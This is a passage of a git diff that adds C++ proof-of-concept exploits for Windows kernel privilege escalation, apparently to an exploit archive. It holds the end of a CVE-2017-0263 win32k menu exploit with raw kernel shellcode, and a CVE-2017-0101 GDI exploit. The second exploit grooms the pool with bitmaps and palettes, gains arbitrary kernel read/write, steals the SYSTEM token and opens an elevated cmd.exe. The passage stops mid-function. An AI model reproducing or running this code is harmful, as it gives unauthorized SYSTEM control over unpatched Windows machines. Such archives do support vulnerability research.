+    0x8b, 0x42, 0x14,                   // mov     eax,dword ptr [edx+14h]
+    0x03, 0xf0,                         // add     esi,eax
+    0x03, 0xf8,                         // add     edi,eax
+    0xad,                               // lods    dword ptr [esi]
+    0xab,                               // stos    dword ptr es:[edi]
+    0x83, 0xe0, 0xf8,                   // and     eax,0FFFFFFF8h
+    0x83, 0x40, 0xe8, 0x02,             // add     dword ptr [eax-18h],2
+    0x61,                               // popad
+    0xb8, 0x9f, 0x9f, 0x00, 0x00,       // mov     eax,9F9Fh
+    0xeb, 0x05,                         // jmp     Loader+0x112d
+    // Loader+0x1128:
+    // Failed in processing.
+    0xb8, 0x01, 0x00, 0x00, 0x00,       // mov     eax,1
+    // Loader+0x112d:
+    0xc9,                               // leave
+    0xc2, 0x10, 0x00,                   // ret     10h
+};
+
+static
+VOID
+xxGetHMValidateHandle(VOID)
+{
+    HMODULE hModule = LoadLibraryA("USER32.DLL");
+    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
+    PBYTE Address = NULL;
+    for (INT i = 0; i < 0x30; i++)
+    {
+        if (*(WORD *)(i + pfnIsMenu) != 0x02B2)
+        {
+            continue;
+        }
+        i += 2;
+        if (*(BYTE *)(i + pfnIsMenu) != 0xE8)
+        {
+            continue;
+        }
+        Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
+        Address = Address + i + 5;
+        pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
+        break;
+    }
+}
+
+#define TYPE_WINDOW 1
+
+static
+PVOID
+xxHMValidateHandleEx(HWND hwnd)
+{
+    return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
+}
+
+static
+PVOID
+xxHMValidateHandle(HWND hwnd)
+{
+    PVOID RetAddr = NULL;
+    if (!pfnHMValidateHandle)
+    {
+        xxGetHMValidateHandle();
+    }
+    if (pfnHMValidateHandle)
+    {
+        RetAddr = xxHMValidateHandleEx(hwnd);
+    }
+    return RetAddr;
+}
+
+static
+ULONG_PTR
+xxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2)
+{
+    __asm { mov eax, num };
+    __asm { int 2eh };
+}
+
+static
+LRESULT
+WINAPI
+xxShadowWindowProc(
+    _In_ HWND   hwnd,
+    _In_ UINT   msg,
+    _In_ WPARAM wParam,
+    _In_ LPARAM lParam
+)
+{
+    if (msg != WM_NCDESTROY || bDoneExploit)
+    {
+        return DefWindowProcW(hwnd, msg, wParam, lParam);
+    }
+    std::cout << "::" << __FUNCTION__ << std::endl;
+    POCDEBUG_BREAK();
+    DWORD dwPopupFake[0xD] = { 0 };
+    dwPopupFake[0x0] = (DWORD)0x00098208;  //->flags
+    dwPopupFake[0x1] = (DWORD)pvHeadFake;  //->spwndNotify
+    dwPopupFake[0x2] = (DWORD)pvHeadFake;  //->spwndPopupMenu
+    dwPopupFake[0x3] = (DWORD)pvHeadFake;  //->spwndNextPopup
+    dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup
+    dwPopupFake[0x5] = (DWORD)pvHeadFake;  //->spmenu
+    dwPopupFake[0x6] = (DWORD)pvHeadFake;  //->spmenuAlternate
+    dwPopupFake[0x7] = (DWORD)pvHeadFake;  //->spwndActivePopup
+    dwPopupFake[0x8] = (DWORD)0xFFFFFFFF;  //->ppopupmenuRoot
+    dwPopupFake[0x9] = (DWORD)pvHeadFake;  //->ppmDelayedFree
+    dwPopupFake[0xA] = (DWORD)0xFFFFFFFF;  //->posSelectedItem
+    dwPopupFake[0xB] = (DWORD)pvHeadFake;  //->posDropped
+    dwPopupFake[0xC] = (DWORD)0;
+    for (UINT i = 0; i < iWindowCount; ++i)
+    {
+        SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake);
+    }
+    xxSyscall(num_NtUserMNDragLeave, 0, 0);
+    LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0);
+    bDoneExploit = Triggered == 0x9F9F;
+    return DefWindowProcW(hwnd, msg, wParam, lParam);
+}
+
+#define MENUCLASS_NAME L"#32768"
+
+static
+LRESULT
+CALLBACK
+xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
+{
+    tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
+    static HWND hwndMenuHit = 0;
+    static UINT iShadowCount = 0;
+
+    if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE)
+    {
+        return CallNextHookEx(0, code, wParam, lParam);
+    }
+    std::cout << "::" << __FUNCTION__ << std::endl;
+    WCHAR szTemp[0x20] = { 0 };
+    GetClassNameW(cwp->hwnd, szTemp, 0x14);
+    if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL)
+    {
+        std::cout << "::iShadowCount=" << iShadowCount << std::endl;
+        POCDEBUG_BREAK();
+        if (++iShadowCount == num_WndShadowCount)
+        {
+            SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc);
+        }
+        else
+        {
+            SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);
+            SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);
+        }
+    }
+    else if (!wcscmp(szTemp, MENUCLASS_NAME))
+    {
+        hwndMenuHit = cwp->hwnd;
+        std::cout << "::hwndMenuHit=" << hwndMenuHit << std::endl;
+    }
+    return CallNextHookEx(0, code, wParam, lParam);
+}
+
+#define MN_ENDMENU 0x1F3
+
+static
+VOID
+CALLBACK
+xxWindowEventProc(
+    HWINEVENTHOOK hWinEventHook,
+    DWORD         event,
+    HWND          hwnd,
+    LONG          idObject,
+    LONG          idChild,
+    DWORD         idEventThread,
+    DWORD         dwmsEventTime
+)
+{
+    UNREFERENCED_PARAMETER(hWinEventHook);
+    UNREFERENCED_PARAMETER(event);
+    UNREFERENCED_PARAMETER(idObject);
+    UNREFERENCED_PARAMETER(idChild);
+    UNREFERENCED_PARAMETER(idEventThread);
+    UNREFERENCED_PARAMETER(dwmsEventTime);
+    std::cout << "::" << __FUNCTION__ << std::endl;
+    if (iMenuCreated == 0)
+    {
+        popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0);
+    }
+    if (++iMenuCreated >= num_PopupMenuCount)
+    {
+        std::cout << ">>SendMessage(MN_ENDMENU)" << std::endl;
+        POCDEBUG_BREAK();
+        SendMessageW(hwnd, MN_ENDMENU, 0, 0);
+    }
+    else
+    {
+        std::cout << ">>SendMessage(WM_LBUTTONDOWN)" << std::endl;
+        POCDEBUG_BREAK();
+        SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002);
+    }
+}
+
+static
+BOOL
+xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra)
+{
+    WNDCLASSEXW wndClass = { 0 };
+    wndClass = { 0 };
+    wndClass.cbSize = sizeof(WNDCLASSEXW);
+    wndClass.lpfnWndProc    = DefWindowProcW;
+    wndClass.cbWndExtra     = cbWndExtra;
+    wndClass.hInstance      = GetModuleHandleA(NULL);
+    wndClass.lpszMenuName   = NULL;
+    wndClass.lpszClassName  = lpszClassName;
+    return RegisterClassExW(&wndClass);
+}
+
+static
+HWND
+xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle)
+{
+    return CreateWindowExW(dwExStyle,
+        lpszClassName,
+        NULL,
+        dwStyle,
+        0,
+        0,
+        1,
+        1,
+        NULL,
+        NULL,
+        GetModuleHandleA(NULL),
+        NULL);
+}
+
+static
+VOID xxCreateCmdLineProcess(VOID)
+{
+    STARTUPINFO si = { sizeof(si) };
+    PROCESS_INFORMATION pi = { 0 };
+    si.dwFlags = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOW;
+    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
+    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
+    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
+}
+
+static
+DWORD
+WINAPI
+xxTrackExploitEx(LPVOID lpThreadParameter)
+{
+    UNREFERENCED_PARAMETER(lpThreadParameter);
+    std::cout << "::" << __FUNCTION__ << std::endl;
+    POCDEBUG_BREAK();
+
+    for (INT i = 0; i < num_PopupMenuCount; i++)
+    {
+        MENUINFO mi = { 0 };
+        hpopupMenu[i]  = CreatePopupMenu();
+        mi.cbSize  = sizeof(mi);
+        mi.fMask   = MIM_STYLE;
+        mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP;
+        SetMenuInfo(hpopupMenu[i], &mi);
+    }
+    for (INT i = 0; i < num_PopupMenuCount; i++)
+    {
+        LPCSTR szMenuItem = "item";
+        AppendMenuA(hpopupMenu[i],
+            MF_BYPOSITION | MF_POPUP,
+            (i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1],
+            szMenuItem);
+    }
+
+    for (INT i = 0; i < 0x100; i++)
+    {
+        WNDCLASSEXW Class = { 0 };
+        WCHAR szTemp[20] = { 0 };
+        HWND hwnd = NULL;
+        wsprintfW(szTemp, L"%x-%d", rand(), i);
+        Class.cbSize        = sizeof(WNDCLASSEXA);
+        Class.lpfnWndProc   = DefWindowProcW;
+        Class.cbWndExtra    = 0;
+        Class.hInstance     = GetModuleHandleA(NULL);
+        Class.lpszMenuName  = NULL;
+        Class.lpszClassName = szTemp;
+        if (!RegisterClassExW(&Class))
+        {
+            continue;
+        }
+        hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED,
+            0,
+            0,
+            0,
+            0,
+            NULL,
+            NULL,
+            GetModuleHandleA(NULL),
+            NULL);
+        if (hwnd == NULL)
+        {
+            continue;
+        }
+        hWindowList[iWindowCount++] = hwnd;
+    }
+    for (INT i = 0; i < iWindowCount; i++)
+    {
+        pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls);
+    }
+
+    DWORD fOldProtect = 0;
+    VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect);
+
+    xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000);
+    hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
+        WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
+        WS_VISIBLE);
+    xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x200);
+    hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
+        WS_EX_LEFT,
+        WS_OVERLAPPED);
+    PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
+    PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4;
+    pvHeadFake = pbExtra + 0x44;
+    for (UINT x = 0; x < 0x7F; x++)
+    {
+        SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra);
+    }
+    PVOID pti = head->thread.pti;
+    SetWindowLongW(hWindowHunt, 0x28, 0);
+    SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti
+    SetWindowLongW(hWindowHunt, 0x6C, 0);
+    SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033);
+    SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF);
+
+    pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16;
+
+    SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc);
+
+    SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc,
+        GetModuleHandleA(NULL),
+        GetCurrentThreadId());
+
+    SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,
+        GetModuleHandleA(NULL),
+        xxWindowEventProc,
+        GetCurrentProcessId(),
+        GetCurrentThreadId(),
+        0);
+
+    TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);
+
+    MSG msg = { 0 };
+    while (GetMessageW(&msg, NULL, 0, 0))
+    {
+        TranslateMessage(&msg);
+        DispatchMessageW(&msg);
+    }
+    return 0;
+}
+
+INT POC_CVE20170263(VOID)
+{
+    std::cout << "-------------------" << std::endl;
+    std::cout << "POC - CVE-2017-0263" << std::endl;
+    std::cout << "-------------------" << std::endl;
+
+    pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    if (pvShellCode == NULL)
+    {
+        return 0;
+    }
+    ZeroMemory(pvShellCode, 0x1000);
+    pvShellCode->pid = GetCurrentProcessId();
+    pvShellCode->off_CLS_lpszMenuName    = 0x050;
+    pvShellCode->off_THREADINFO_ppi      = 0x0b8;
+    pvShellCode->off_EPROCESS_ActiveLink = 0x0b8;
+    pvShellCode->off_EPROCESS_Token      = 0x0f8;
+    CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc));
+
+    std::cout << "CREATE WORKER THREAD..." << std::endl;
+    POCDEBUG_BREAK();
+    HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);
+    if (hThread == NULL)
+    {
+        return FALSE;
+    }
+    while (!bDoneExploit)
+    {
+        Sleep(500);
+    }
+    xxCreateCmdLineProcess();
+    DestroyWindow(hWindowMain);
+    TerminateThread(hThread, 0);
+    std::cout << "-------------------" << std::endl;
+    getchar();
+    return bDoneExploit;
+}
+
+INT main(INT argc, CHAR *argv[])
+{
+    POC_CVE20170263();
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44479.cpp b/exploits/windows_x86/local/44479.cpp
new file mode 100644
index 000000000..9543896cc
--- /dev/null
+++ b/exploits/windows_x86/local/44479.cpp
@@ -0,0 +1,666 @@
+#include <Windows.h>
+#include <wingdi.h>
+#include <iostream>
+#include <Psapi.h>
+#pragma comment(lib, "psapi.lib")
+
+#define POCDEBUG 0
+
+#if POCDEBUG == 1
+#define POCDEBUG_BREAK() getchar()
+#elif POCDEBUG == 2
+#define POCDEBUG_BREAK() DebugBreak()
+#else
+#define POCDEBUG_BREAK()
+#endif
+
+CONST LONG maxTimes = 2000;
+CONST LONG tmpTimes = 3000;
+static HBITMAP hbitmap[maxTimes] = { NULL };
+static HPALETTE hpalette[maxTimes] = { NULL };
+
+static DWORD    iMemHunted = NULL;
+static HBITMAP  hBmpHunted = NULL;
+static PDWORD   pBmpHunted = NULL;
+static HPALETTE hPalExtend = NULL;
+
+CONST LONG iExtPaleHmgr = 809;
+CONST LONG iExtcEntries = 814;
+CONST LONG iExtPalColor = 828;
+
+typedef struct _PATRECT {
+    INT nXLeft;
+    INT nYLeft;
+    INT nWidth;
+    INT nHeight;
+    HBRUSH hBrush;
+} PATRECT, *PPATRECT;
+
+typedef BOOL (WINAPI *pfPolyPatBlt)(HDC hdc, DWORD rop, PPATRECT pPoly, DWORD Count, DWORD Mode);
+
+static
+BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
+{
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
+        if (hbitmap[i] == NULL)
+        {
+            return FALSE;
+        }
+    }
+    return TRUE;
+}
+
+static
+BOOL xxDeleteBitmaps(VOID)
+{
+    BOOL bReturn = FALSE;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        bReturn = DeleteObject(hbitmap[i]);
+        hbitmap[i] = NULL;
+    }
+    return bReturn;
+}
+
+static
+BOOL xxRegisterWndClasses(LPCSTR menuName)
+{
+    POCDEBUG_BREAK();
+    CHAR buf[0x10] = { 0 };
+    for (LONG i = 0; i < tmpTimes; i++)
+    {
+        WNDCLASSEXA Class = { 0 };
+        sprintf(buf, "CLS_%d", i);
+        Class.lpfnWndProc = DefWindowProcA;
+        Class.lpszClassName = buf;
+        Class.lpszMenuName = menuName;
+        Class.cbSize = sizeof(WNDCLASSEXA);
+        if (!RegisterClassExA(&Class))
+        {
+            return FALSE;
+        }
+    }
+    return TRUE;
+}
+
+static
+BOOL xxDigHoleInWndClasses(LONG b, LONG e)
+{
+    BOOL bReturn = FALSE;
+    CHAR buf[0x10] = { 0 };
+    for (LONG i = b; i < e; i++)
+    {
+        sprintf(buf, "CLS_%d", i);
+        bReturn = UnregisterClassA(buf, NULL);
+    }
+    return bReturn;
+}
+
+static
+BOOL xxUnregisterWndClasses(VOID)
+{
+    BOOL bReturn = FALSE;
+    CHAR buf[0x10] = { 0 };
+    for (LONG i = 0; i < tmpTimes; i++)
+    {
+        sprintf(buf, "CLS_%d", i);
+        bReturn = UnregisterClassA(buf, NULL);
+    }
+    return bReturn;
+}
+
+static
+BOOL xxCreatePalettes(ULONG cEntries)
+{
+    BOOL bReturn = FALSE;
+    POCDEBUG_BREAK();
+    PLOGPALETTE pal = NULL;
+    // 0x64*4+0x58+8=0x1f0
+    pal = (PLOGPALETTE)malloc(sizeof(LOGPALETTE) + cEntries * sizeof(PALETTEENTRY));
+    pal->palVersion = 0x300;
+    pal->palNumEntries = cEntries;
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        hpalette[i] = CreatePalette(pal);
+        if (hpalette[i] == NULL)
+        {
+            bReturn = FALSE;
+            break;
+        }
+        bReturn = TRUE;
+    }
+    free(pal);
+    return bReturn;
+}
+
+static
+BOOL xxDeletePalettes(VOID)
+{
+    BOOL bReturn = FALSE;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        bReturn = DeleteObject(hpalette[i]);
+        hpalette[i] = NULL;
+    }
+    return bReturn;
+}
+
+static
+BOOL xxRetrieveBitmapBits(VOID)
+{
+    pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
+    ZeroMemory(pBmpHunted, 0x1000);
+    LONG index = -1;
+    LONG iLeng = -1;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
+        if (iLeng < 0xCA0)
+        {
+            continue;
+        }
+        index = i;
+        std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
+        hBmpHunted = hbitmap[i];
+        break;
+    }
+    if (index == -1)
+    {
+        std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+VOID xxOutputBitmapBits(VOID)
+{
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
+    {
+        std::cout << '[';
+        std::cout.fill('0');
+        std::cout.width(4);
+        std::cout << i << ']' << (PVOID)pBmpHunted[i];
+        if (((i + 1) % 4) != 0)
+        {
+            std::cout << " ";
+        }
+        else
+        {
+            std::cout << std::endl;
+        }
+    }
+    std::cout.width(0);
+}
+
+static
+BOOL xxGetExtendPalette(HPALETTE hHandle)
+{
+    LONG index = -1;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        if (hpalette[i] != hHandle)
+        {
+            continue;
+        }
+        index = i;
+        std::cout << "LOCATE: " << '[' << i << ']' << hpalette[i] << std::endl;
+        hPalExtend = hpalette[i];
+        break;
+    }
+    if (index == -1)
+    {
+        std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxPoint(LONG id, DWORD Value)
+{
+    LONG iLeng = 0x00;
+    pBmpHunted[id] = Value;
+    iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
+    if (iLeng < 0xD00)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
+{
+    UINT iLeng = 0;
+    pBmpHunted[iExtPalColor] = addr;
+    iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
+    if (iLeng < 0xD00)
+    {
+        return FALSE;
+    }
+    PVOID pvTable = NULL;
+    UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
+    pvTable = malloc(cbSize);
+    memcpy(pvTable, pvBits, cb);
+    iLeng = SetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
+    free(pvTable);
+    if (iLeng < cbSize / 4)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
+{
+    BOOL iLeng = 0;
+    pBmpHunted[iExtPalColor] = addr;
+    iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
+    if (iLeng < 0xD00)
+    {
+        return FALSE;
+    }
+    PVOID pvTable = NULL;
+    UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
+    pvTable = malloc(cbSize);
+    iLeng = GetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
+    memcpy(pvBits, pvTable, cb);
+    free(pvTable);
+    if (iLeng < cbSize / 4)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxFixHuntedPoolHeader(VOID)
+{
+    DWORD szInputBit[0x100] = { 0 };
+    CONST LONG iTrueBmpHead = 937;
+    szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
+    szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
+    BOOL bReturn = FALSE;
+    bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxFixHuntedBitmapObject(VOID)
+{
+    DWORD szInputBit[0x100] = { 0 };
+    szInputBit[0] = (DWORD)hBmpHunted;
+    BOOL bReturn = FALSE;
+    bReturn = xxPointToHit(iMemHunted + 0x08, szInputBit, 0x04);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    bReturn = xxPointToHit(iMemHunted + 0x1c, szInputBit, 0x04);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+DWORD_PTR
+xxGetNtoskrnlAddress(VOID)
+{
+    DWORD_PTR AddrList[500] = { 0 };
+    DWORD cbNeeded = 0;
+    EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
+    return AddrList[0];
+}
+
+static
+DWORD_PTR
+xxGetSysPROCESS(VOID)
+{
+    DWORD_PTR Module = 0x00;
+    DWORD_PTR NtAddr = 0x00;
+    Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
+    NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+    FreeLibrary((HMODULE)Module);
+    NtAddr = NtAddr - Module;
+    Module = xxGetNtoskrnlAddress();
+    if (Module == 0x00)
+    {
+        return 0x00;
+    }
+    NtAddr = NtAddr + Module;
+    if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
+    {
+        return 0x00;
+    }
+    return NtAddr;
+}
+
+CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
+CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
+
+static
+DWORD_PTR
+xxGetTarPROCESS(DWORD_PTR SysPROC)
+{
+    if (SysPROC == 0x00)
+    {
+        return 0x00;
+    }
+    DWORD_PTR point = SysPROC;
+    DWORD_PTR value = 0x00;
+    do
+    {
+        value = 0x00;
+        xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
+        if (value == 0x00)
+        {
+            break;
+        }
+        if (value == GetCurrentProcessId())
+        {
+            return point;
+        }
+        value = 0x00;
+        xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
+        if (value == 0x00)
+        {
+            break;
+        }
+        point = value - off_EPROCESS_ActiveLinks;
+        if (point == SysPROC)
+        {
+            break;
+        }
+    } while (TRUE);
+    return 0x00;
+}
+
+CONST LONG off_EPROCESS_Token = 0x0f8;
+static DWORD_PTR dstToken = 0x00;
+static DWORD_PTR srcToken = 0x00;
+
+static
+BOOL
+xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
+{
+    if (dstPROC == 0x00 || srcPROC == 0x00)
+    {
+        return FALSE;
+    }
+    // get target process original token pointer
+    xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
+    if (dstToken == 0x00)
+    {
+        return FALSE;
+    }
+    // get system process token pointer
+    xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
+    if (srcToken == 0x00)
+    {
+        return FALSE;
+    }
+    // modify target process token pointer to system
+    xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
+    // just test if the modification is successful
+    DWORD_PTR tmpToken = 0x00;
+    xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
+    if (tmpToken != srcToken)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL
+xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
+{
+    if (dstPROC == 0x00 || srcPROC == 0x00)
+    {
+        return FALSE;
+    }
+    if (dstToken == 0x00 || srcToken == 0x00)
+    {
+        return FALSE;
+    }
+    // recover the original token pointer to target process
+    xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
+    return TRUE;
+}
+
+static
+VOID xxCreateCmdLineProcess(VOID)
+{
+    STARTUPINFO si = { sizeof(si) };
+    PROCESS_INFORMATION pi = { 0 };
+    si.dwFlags = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOW;
+    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
+    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
+    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
+}
+
+static
+VOID xxPrivilegeElevation(VOID)
+{
+    BOOL bReturn = FALSE;
+    do
+    {
+        DWORD SysPROC = 0x0;
+        DWORD TarPROC = 0x0;
+        POCDEBUG_BREAK();
+        SysPROC = xxGetSysPROCESS();
+        if (SysPROC == 0x00)
+        {
+            break;
+        }
+        std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
+        POCDEBUG_BREAK();
+        TarPROC = xxGetTarPROCESS(SysPROC);
+        if (TarPROC == 0x00)
+        {
+            break;
+        }
+        std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
+        POCDEBUG_BREAK();
+        bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
+        if (!bReturn)
+        {
+            break;
+        }
+        std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
+        std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
+        POCDEBUG_BREAK();
+        xxCreateCmdLineProcess();
+        POCDEBUG_BREAK();
+        std::cout << "RECOVER TOKEN..." << std::endl;
+        bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
+        if (!bReturn)
+        {
+            break;
+        }
+        bReturn = TRUE;
+    } while (FALSE);
+    if (!bReturn)
+    {
+        std::cout << "FAILED" << std::endl;
+    }
+}
+
+INT POC_CVE20170101(VOID)
+{
+    std::cout << "-------------------" << std::endl;
+    std::cout << "POC - CVE-2017-0101" << std::endl;
+    std::cout << "-------------------" << std::endl;
+
+    BOOL bReturn = FALSE;
+    HDC hdc = NULL;
+    HBITMAP hbmp = NULL;
+    HBRUSH hbru = NULL;
+    pfPolyPatBlt pfnPolyPatBlt = NULL;
+    do
+    {
+        hdc = GetDC(NULL);
+        std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
+        if (hdc == NULL)
+        {
+            break;
+        }
+
+        std::cout << "CREATE PATTERN BRUSH BITMAP..." << std::endl;
+        hbmp = CreateBitmap(0x36D, 0x12AE8F, 1, 1, NULL);
+        if (hbmp == NULL)
+        {
+            break;
+        }
+
+        std::cout << "CREATE PATTERN BRUSH..." << std::endl;
+        hbru = CreatePatternBrush(hbmp);
+        if (hbru == NULL)
+        {
+            break;
+        }
+
+        std::cout << "CREATE BITMAPS (1)..." << std::endl;
+        bReturn = xxCreateBitmaps(0xE8C, 1, 8);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "REGISTER WINDOW CLASSES..." << std::endl;
+        bReturn = xxRegisterWndClasses("KCUF");
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "DELETE BITMAPS (1)..." << std::endl;
+        xxDeleteBitmaps();
+
+        std::cout << "CREATE BITMAPS (2)..." << std::endl;
+        bReturn = xxCreateBitmaps(0xC98, 1, 8);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "CREATE PALETTES (1)..." << std::endl;
+        bReturn = xxCreatePalettes(0x64);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "UNREGISTER WINDOW CLASSES (H)..." << std::endl;
+        xxDigHoleInWndClasses(1000, 2000);
+
+        std::cout << "POLYPATBLT..." << std::endl;
+        POCDEBUG_BREAK();
+        pfnPolyPatBlt = (pfPolyPatBlt)GetProcAddress(GetModuleHandleA("gdi32"), "PolyPatBlt");
+        if (pfnPolyPatBlt == NULL)
